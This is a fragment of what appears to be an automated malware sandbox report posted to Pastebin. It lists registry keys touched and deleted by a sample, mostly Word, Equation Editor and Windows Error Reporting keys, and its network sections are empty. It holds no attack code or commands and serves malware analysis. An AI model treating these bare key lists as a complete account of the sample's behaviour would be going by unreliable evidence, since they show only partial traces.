  568. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTF",
  569. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTA",
  570. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
  571. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
  572. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General",
  573. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Zoom",
  574. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\CustomZoom",
  575. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ShowAll",
  576. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Version",
  577. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ForceOpen",
  578. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDocked",
  579. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarShown",
  580. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDockPos",
  581. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\MTUpgradeDialog",
  582. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes",
  583. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Full",
  584. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Script",
  585. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\ScriptScript",
  586. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Symbol",
  587. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\SubSymbol",
  588. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing",
  589. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LineSpacing",
  590. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixRowSpacing",
  591. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixColSpacing",
  592. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SuperscriptHeight",
  593. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubscriptDepth",
  594. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimHeight",
  595. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimDepth",
  596. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimLineSpacing",
  597. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\NumerHeight",
  598. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\DenomDepth",
  599. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarOver",
  600. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarThick",
  601. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubFractBarThick",
  602. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FenceOver",
  603. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SpacingFactor",
  604. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MinGap",
  605. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\RadicalGap",
  606. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\EmbellGap",
  607. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\PrimeHeight",
  608. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts",
  609. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Text",
  610. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Function",
  611. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Variable",
  612. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\LCGreek",
  613. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\UCGreek",
  614. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Symbol",
  615. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Vector",
  616. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Number",
  617. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User1",
  618. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User2",
  619. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows",
  620. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\EquationWindow",
  621. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\SpacingWindow",
  622. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\TextLanguage",
  623. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\MathLanguage",
  624. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  625. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
  626. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
  627. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
  628. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
  629. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
  630. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
  631. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\OfficeSoftwareProtectionPlatform\\ServiceSessionId",
  632. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  633. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
  634. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\NHRTimes"
  635.  
  636.  
  637. * Deleted Registry Keys:
  638. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\/ys",
  639. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\f=q",
  640. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTT",
  641. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
  642. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
  643.  
  644.  
  645. * DNS Communications:
  646.  
  647. * Domains:
  648.  
  649. * Network Communication - ICMP:
  650.  
  651. * Network Communication - HTTP:
  652.  
  653. * Network Communication - SMTP:
  654.  
  655. * Network Communication - Hosts:
  656.  
  657. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!